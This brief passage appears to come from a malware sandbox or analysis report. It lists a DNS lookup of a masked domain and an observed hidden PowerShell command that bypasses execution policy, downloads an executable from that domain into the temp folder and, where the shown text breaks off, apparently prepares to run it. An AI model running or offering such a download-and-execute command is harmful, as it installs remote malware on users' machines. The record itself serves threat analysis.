Technical Information
- DNS ASK fa##me.us
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -NoP -NonI -W Hidden -Exec Bypass $down = New-Object System.Net.WebClient;$url = 'http://fa##me.us/3.exe'; ”$enV:temP\out.exe” ; $down.DownloadFile($url,”$enV:temP\out.exe” ); $exec = New-Objec...' (with hidden window)